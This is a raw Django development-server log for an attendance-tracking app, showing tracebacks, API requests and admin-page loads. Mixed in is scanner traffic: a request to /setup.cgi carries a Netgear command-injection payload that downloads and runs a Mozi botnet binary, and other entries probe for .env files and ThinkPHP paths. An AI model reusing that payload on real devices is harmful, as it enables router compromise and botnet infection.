Traceback (most recent call last):
  File "manage.py", line 10, in main
    from django.core.management import execute_from_command_line
ModuleNotFoundError: No module named 'django'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "manage.py", line 21, in <module>
    main()
  File "manage.py", line 16, in main
    ) from exc
ImportError: Couldn't import Django. Are you sure it's installed and available on your PYTHONPATH environment variable? Did you forget to activate a virtual environment?
Watching for file changes with StatReloader
[31/Jan/2020 18:47:33] "GET / HTTP/1.1" 200 16351
[31/Jan/2020 18:47:33] "GET /static/admin/css/fonts.css HTTP/1.1" 304 0
[31/Jan/2020 18:47:33] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 304 0
[31/Jan/2020 18:47:33] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 304 0
[31/Jan/2020 18:47:34] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 304 0
[31/Jan/2020 18:47:35] "GET / HTTP/1.1" 200 16351
Not Found: /setup.cgi
[31/Jan/2020 18:56:42] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 2168
Not Found: /editBlackAndWhiteList
[31/Jan/2020 19:03:21] "POST /editBlackAndWhiteList HTTP/1.1" 404 2016
Not Found: /TP/public/index.php
[31/Jan/2020 19:04:11] "GET /TP/public/index.php HTTP/1.1" 404 2006
Not Found: /TP/index.php
[31/Jan/2020 19:04:12] "GET /TP/index.php HTTP/1.1" 404 1985
Not Found: /thinkphp/html/public/index.php
[31/Jan/2020 19:04:12] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 2039
Not Found: /html/public/index.php
[31/Jan/2020 19:04:13] "GET /html/public/index.php HTTP/1.1" 404 2012
Not Found: /public/index.php
[31/Jan/2020 19:04:14] "GET /public/index.php HTTP/1.1" 404 1997
Not Found: /TP/html/public/index.php
[31/Jan/2020 19:04:14] "GET /TP/html/public/index.php HTTP/1.1" 404 2021
Not Found: /elrekt.php
[31/Jan/2020 19:04:15] "GET /elrekt.php HTTP/1.1" 404 1979
Not Found: /index.php
[31/Jan/2020 19:04:15] "GET /index.php HTTP/1.1" 404 1976
[31/Jan/2020 19:04:16] "GET / HTTP/1.1" 200 16351
Performing system checks...

System check identified no issues (0 silenced).
January 31, 2020 - 18:47:26
Django version 3.0.2, using settings 'attendance_system.settings'
Starting development server at http://0.0.0.0:80/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[01/Feb/2020 05:57:05] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 06:00:55] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
Unsupported Media Type: /api/v1/get-auth/
[01/Feb/2020 06:01:00] "POST /api/v1/get-auth/ HTTP/1.1" 415 62
Unsupported Media Type: /api/v1/get-auth/
[01/Feb/2020 06:04:44] "POST /api/v1/get-auth/ HTTP/1.1" 415 62
Unsupported Media Type: /api/v1/get-auth/
[01/Feb/2020 06:05:19] "POST /api/v1/get-auth/ HTTP/1.1" 415 62
Not Found: /.env
[01/Feb/2020 06:12:41] "GET /.env HTTP/1.1" 404 2212
Not Found: /
[01/Feb/2020 06:42:47] "GET / HTTP/1.1" 404 2182
Bad Request: /api/v1/get-auth/
[01/Feb/2020 06:49:15] "POST /api/v1/get-auth/ HTTP/1.1" 400 79
Unauthorized: /api/v1/test/
[01/Feb/2020 06:50:42] "POST /api/v1/test/ HTTP/1.1" 401 58
Unauthorized: /api/v1/test/
[01/Feb/2020 06:50:54] "POST /api/v1/test/ HTTP/1.1" 401 58
Unauthorized: /api/v1/test/
[01/Feb/2020 06:51:11] "POST /api/v1/test/ HTTP/1.1" 401 58
Unauthorized: /api/v1/test/
[01/Feb/2020 06:52:12] "POST /api/v1/test/ HTTP/1.1" 401 58
Unauthorized: /api/v1/test/
[01/Feb/2020 06:52:54] "POST /api/v1/test/ HTTP/1.1" 401 58
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 06:54:28] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
[01/Feb/2020 06:54:33] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
Unauthorized: /api/v1/test/
[01/Feb/2020 06:55:53] "GET /api/v1/test/ HTTP/1.1" 401 3758
[01/Feb/2020 06:55:53] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[01/Feb/2020 06:55:53] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[01/Feb/2020 06:55:53] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[01/Feb/2020 06:55:53] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[01/Feb/2020 06:55:54] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[01/Feb/2020 06:55:54] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[01/Feb/2020 06:55:54] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.1" 200 88145
[01/Feb/2020 06:55:54] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[01/Feb/2020 06:55:54] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[01/Feb/2020 06:55:54] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[01/Feb/2020 06:55:54] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
Unauthorized: /api/v1/test/
[01/Feb/2020 06:56:28] "GET /api/v1/test/ HTTP/1.1" 401 3758
[01/Feb/2020 06:56:28] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[01/Feb/2020 06:56:28] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[01/Feb/2020 06:56:28] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[01/Feb/2020 06:56:28] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[01/Feb/2020 06:56:28] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.1" 200 88145
[01/Feb/2020 06:56:28] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[01/Feb/2020 06:56:28] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[01/Feb/2020 06:56:28] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[01/Feb/2020 06:56:28] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[01/Feb/2020 06:56:29] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
[01/Feb/2020 06:56:29] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
Not Found: /favicon.ico
[01/Feb/2020 06:56:29] "GET /favicon.ico HTTP/1.1" 404 2233
Unauthorized: /api/v1/test/
[01/Feb/2020 06:56:48] "GET /api/v1/test/ HTTP/1.1" 401 3758
Internal Server Error: /api/v1/test/
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/utils.py", line 86, in _execute
    return self.cursor.execute(sql, params)
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/sqlite3/base.py", line 396, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.IntegrityError: NOT NULL constraint failed: Location_location.location_coordinates

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/base.py", line 115, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/base.py", line 113, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/views/generic/base.py", line 71, in view
    return self.dispatch(request, *args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 505, in dispatch
    response = self.handle_exception(exc)
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 465, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 476, in raise_uncaught_exception
    raise exc
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 502, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/prashant_rawat216/AttendanceSystem/Location/views.py", line 20, in post
    location_coordinates=request.data.get('location'))
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/manager.py", line 82, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/query.py", line 433, in create
    obj.save(force_insert=True, using=self.db)
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/base.py", line 746, in save
    force_update=force_update, update_fields=update_fields)
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/base.py", line 784, in save_base
    force_update, using, update_fields,
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/base.py", line 887, in _save_table
    results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/base.py", line 926, in _do_insert
    using=using, raw=raw,
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/manager.py", line 82, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/query.py", line 1204, in _insert
    return query.get_compiler(using=using).execute_sql(returning_fields)
  File "/usr/local/lib/python3.6/dist-packages/django/db/models/sql/compiler.py", line 1384, in execute_sql
    cursor.execute(sql, params)
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/utils.py", line 100, in execute
    return super().execute(sql, params)
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/utils.py", line 68, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/utils.py", line 77, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/utils.py", line 86, in _execute
    return self.cursor.execute(sql, params)
  File "/usr/local/lib/python3.6/dist-packages/django/db/utils.py", line 90, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/utils.py", line 86, in _execute
    return self.cursor.execute(sql, params)
  File "/usr/local/lib/python3.6/dist-packages/django/db/backends/sqlite3/base.py", line 396, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.IntegrityError: NOT NULL constraint failed: Location_location.location_coordinates
[01/Feb/2020 06:57:28] "POST /api/v1/test/ HTTP/1.1" 500 18223
[01/Feb/2020 06:57:45] "POST /api/v1/test/ HTTP/1.1" 200 15
[01/Feb/2020 06:58:03] "POST /api/v1/test/ HTTP/1.1" 200 15
[01/Feb/2020 06:58:14] "POST /api/v1/test/ HTTP/1.1" 200 15
Internal Server Error: /api/v1/test
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.6/dist-packages/django/utils/deprecation.py", line 93, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.6/dist-packages/django/middleware/common.py", line 54, in process_request
    path = self.get_full_path_with_slash(request)
  File "/usr/local/lib/python3.6/dist-packages/django/middleware/common.py", line 94, in get_full_path_with_slash
    'url': request.get_host() + new_path,
RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 34.93.120.120/api/v1/test/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings.
[01/Feb/2020 07:00:11] "POST /api/v1/test HTTP/1.1" 500 61907
Internal Server Error: /api/v1/test
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.6/dist-packages/django/utils/deprecation.py", line 93, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.6/dist-packages/django/middleware/common.py", line 54, in process_request
    path = self.get_full_path_with_slash(request)
  File "/usr/local/lib/python3.6/dist-packages/django/middleware/common.py", line 94, in get_full_path_with_slash
    'url': request.get_host() + new_path,
RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 34.93.120.120/api/v1/test/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings.
[01/Feb/2020 07:00:22] "POST /api/v1/test HTTP/1.1" 500 62220
[01/Feb/2020 07:00:31] "POST /api/v1/test/ HTTP/1.1" 200 15
Internal Server Error: /api/v1/test
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.6/dist-packages/django/utils/deprecation.py", line 93, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.6/dist-packages/django/middleware/common.py", line 54, in process_request
    path = self.get_full_path_with_slash(request)
  File "/usr/local/lib/python3.6/dist-packages/django/middleware/common.py", line 94, in get_full_path_with_slash
    'url': request.get_host() + new_path,
RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 34.93.120.120/api/v1/test/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings.
[01/Feb/2020 07:01:27] "POST /api/v1/test HTTP/1.1" 500 62220
[01/Feb/2020 07:01:32] "POST /api/v1/test/ HTTP/1.1" 200 15
[01/Feb/2020 07:13:05] "GET /admin/ HTTP/1.1" 302 0
[01/Feb/2020 07:13:06] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 1913
[01/Feb/2020 07:13:06] "GET /static/admin/css/base.css HTTP/1.1" 200 16378
[01/Feb/2020 07:13:06] "GET /static/admin/css/login.css HTTP/1.1" 200 1233
[01/Feb/2020 07:13:06] "GET /static/admin/css/responsive.css HTTP/1.1" 200 18052
[01/Feb/2020 07:13:07] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[01/Feb/2020 07:13:08] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 85692
[01/Feb/2020 07:13:08] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 85876
[01/Feb/2020 07:13:17] "POST /admin/login/?next=/admin/ HTTP/1.1" 302 0
[01/Feb/2020 07:13:17] "GET /admin/ HTTP/1.1" 200 4759
[01/Feb/2020 07:13:17] "GET /static/admin/css/dashboard.css HTTP/1.1" 200 412
[01/Feb/2020 07:13:17] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 200 331
[01/Feb/2020 07:13:17] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 200 380
[01/Feb/2020 07:13:17] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 200 86184
[01/Feb/2020 07:13:19] "GET /admin/auth/user/ HTTP/1.1" 200 7018
[01/Feb/2020 07:13:19] "GET /static/admin/css/changelists.css HTTP/1.1" 200 6190
[01/Feb/2020 07:13:19] "GET /admin/jsi18n/ HTTP/1.1" 200 3223
[01/Feb/2020 07:13:19] "GET /static/admin/js/core.js HTTP/1.1" 200 5723
[01/Feb/2020 07:13:19] "GET /static/admin/js/jquery.init.js HTTP/1.1" 200 363
[01/Feb/2020 07:13:19] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 200 6918
[01/Feb/2020 07:13:19] "GET /static/admin/js/actions.js HTTP/1.1" 200 6766
[01/Feb/2020 07:13:19] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.1" 200 280364
[01/Feb/2020 07:13:19] "GET /static/admin/js/urlify.js HTTP/1.1" 200 8941
[01/Feb/2020 07:13:19] "GET /static/admin/js/prepopulate.js HTTP/1.1" 200 1530
[01/Feb/2020 07:13:19] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.1" 200 128820
[01/Feb/2020 07:13:19] "GET /static/admin/img/search.svg HTTP/1.1" 200 458
[01/Feb/2020 07:13:19] "GET /static/admin/img/icon-yes.svg HTTP/1.1" 200 436
[01/Feb/2020 07:13:19] "GET /static/admin/img/icon-no.svg HTTP/1.1" 200 560
[01/Feb/2020 07:13:19] "GET /static/admin/img/tooltag-add.svg HTTP/1.1" 200 331
[01/Feb/2020 07:13:19] "GET /static/admin/img/sorting-icons.svg HTTP/1.1" 200 1097
[01/Feb/2020 07:13:22] "GET /admin/auth/user/1/change/ HTTP/1.1" 200 16023
[01/Feb/2020 07:13:22] "GET /static/admin/css/forms.css HTTP/1.1" 200 8518
[01/Feb/2020 07:13:22] "GET /static/admin/js/calendar.js HTTP/1.1" 200 7777
[01/Feb/2020 07:13:22] "GET /static/admin/js/SelectBox.js HTTP/1.1" 200 5753
[01/Feb/2020 07:13:22] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.1" 200 20232
[01/Feb/2020 07:13:22] "GET /admin/jsi18n/ HTTP/1.1" 200 3223
[01/Feb/2020 07:13:22] "GET /static/admin/js/SelectFilter2.js HTTP/1.1" 200 12318
[01/Feb/2020 07:13:22] "GET /static/admin/js/change_form.js HTTP/1.1" 200 712
[01/Feb/2020 07:13:23] "GET /static/admin/css/widgets.css HTTP/1.1" 200 10322
[01/Feb/2020 07:13:23] "GET /static/admin/js/prepopulate_init.js HTTP/1.1" 200 495
[01/Feb/2020 07:13:23] "GET /static/admin/img/icon-unknown-alt.svg HTTP/1.1" 200 655
[01/Feb/2020 07:13:23] "GET /static/admin/img/icon-clock.svg HTTP/1.1" 200 677
[01/Feb/2020 07:13:23] "GET /static/admin/img/icon-unknown.svg HTTP/1.1" 200 655
[01/Feb/2020 07:13:23] "GET /static/admin/img/selector-icons.svg HTTP/1.1" 200 3291
[01/Feb/2020 07:13:23] "GET /static/admin/img/icon-calendar.svg HTTP/1.1" 200 1086
Not Found: /
[01/Feb/2020 07:14:43] "GET / HTTP/1.1" 404 2212
Not Found: /.env
[01/Feb/2020 07:18:36] "GET /.env HTTP/1.1" 404 2212
Not Found: /.env
[01/Feb/2020 07:23:16] "GET /.env HTTP/1.1" 404 2212
The number of GET/POST parameters exceeded settings.DATA_UPLOAD_MAX_NUMBER_FIELDS.
Bad Request: /api/v1/test/
[01/Feb/2020 07:53:31] "POST /api/v1/test/ HTTP/1.1" 400 16173
Not Found: /
[01/Feb/2020 07:56:17] "GET / HTTP/1.1" 404 2182
----------------------------------------
Exception happened during processing of request from ('218.89.107.200', 39271)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /robots.txt
[01/Feb/2020 07:56:17] "GET /robots.txt HTTP/1.1" 404 2230
----------------------------------------
Exception happened during processing of request from ('218.89.107.200', 39373)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /Admin78785d22/Login.php
[01/Feb/2020 07:56:18] "POST /Admin78785d22/Login.php HTTP/1.1" 404 2270
----------------------------------------
Exception happened during processing of request from ('218.89.107.200', 39493)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:18:54] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:19:21] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:20:07] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:21:46] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:22:29] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 08:22:49] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:25:15] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 08:25:23] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
Not Found: /
[01/Feb/2020 08:36:14] "GET / HTTP/1.1" 404 2185
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:49:15] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 08:49:24] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 08:49:24] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:50:57] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:50:59] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Method Not Allowed: /api/v1/get-auth/
[01/Feb/2020 08:51:15] "GET /api/v1/get-auth/ HTTP/1.1" 405 40
[01/Feb/2020 08:55:56] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:59:17] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:59:30] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:59:36] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:59:37] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 08:59:37] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
Bad Request: /api/v1/get-auth/
[01/Feb/2020 09:00:05] "POST /api/v1/get-auth/ HTTP/1.1" 400 68
[01/Feb/2020 09:00:55] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
[01/Feb/2020 09:07:10] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
[01/Feb/2020 09:09:52] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
[01/Feb/2020 09:15:51] "POST /api/v1/test/ HTTP/1.1" 200 15
[01/Feb/2020 09:33:01] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
[01/Feb/2020 09:34:03] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
Not Found: /.env
[01/Feb/2020 09:35:29] "GET /.env HTTP/1.1" 404 2212
[01/Feb/2020 09:36:59] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
[01/Feb/2020 09:36:59] "POST /api/v1/test/ HTTP/1.1" 200 15
[01/Feb/2020 10:29:54] "POST /api/v1/get-auth/ HTTP/1.1" 200 52
[01/Feb/2020 10:32:54] code 400, message Bad request syntax ('{D79E94C5-70F0-46BD-965B-E17497CCB598}')
[01/Feb/2020 10:32:54] "{D79E94C5-70F0-46BD-965B-E17497CCB598}" 400 -
/home/prashant_rawat216/AttendanceSystem/Location/views.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
February 01, 2020 - 05:56:47
Django version 3.0.2, using settings 'attendance_system.settings'
Starting development server at http://0.0.0.0:80/
Quit the server with CONTROL-C.
None
2
2
4
2
2
2
2
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.6/threading.py", line 864, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/utils/autoreload.py", line 53, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/core/management/commands/runserver.py", line 117, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.6/dist-packages/django/core/management/base.py", line 395, in check
    include_deployment_checks=include_deployment_checks,
  File "/usr/local/lib/python3.6/dist-packages/django/core/management/base.py", line 382, in _run_checks
    return checks.run_checks(**kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/core/checks/registry.py", line 72, in run_checks
    new_errors = check(app_configs=app_configs)
  File "/usr/local/lib/python3.6/dist-packages/django/core/checks/urls.py", line 13, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.6/dist-packages/django/core/checks/urls.py", line 23, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.6/dist-packages/django/urls/resolvers.py", line 407, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.6/dist-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.6/dist-packages/django/urls/resolvers.py", line 588, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.6/dist-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.6/dist-packages/django/urls/resolvers.py", line 581, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/prashant_rawat216/AttendanceSystem/attendance_system/urls.py", line 19, in <module>
    from Location import views
  File "/home/prashant_rawat216/AttendanceSystem/Location/views.py", line 21
    return Response({'work':request.FILE['file'], 'req': request})
    ^
IndentationError: unexpected indent

/home/prashant_rawat216/AttendanceSystem/Location/views.py changed, reloading.
Performing system checks...

Watching for file changes with StatReloader
Watching for file changes with StatReloader
Unauthorized: /api/v1/test/
[01/Feb/2020 11:19:37] "GET /api/v1/test/ HTTP/1.1" 401 3758
Not Found: /
[01/Feb/2020 11:28:38] "GET / HTTP/1.1" 404 2182
Not Found: /api/v1/upload
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 183, in finish_response
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 113, in close
    self.get_stdin()._read_limited()
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/wsgi.py", line 28, in _read_limited
    result = self.stream.read(size)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
/home/prashant_rawat216/AttendanceSystem/Location/views.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
February 01, 2020 - 11:19:21
Django version 3.0.2, using settings 'attendance_system.settings'
Starting development server at http://0.0.0.0:80/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/prashant_rawat216/AttendanceSystem/attendance_system/urls.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
February 01, 2020 - 11:57:32
Django version 3.0.2, using settings 'attendance_system.settings'
Starting development server at http://0.0.0.0:80/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
February 01, 2020 - 11:59:03
Django version 3.0.2, using settings 'attendance_system.settings'
Starting development server at http://0.0.0.0:80/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
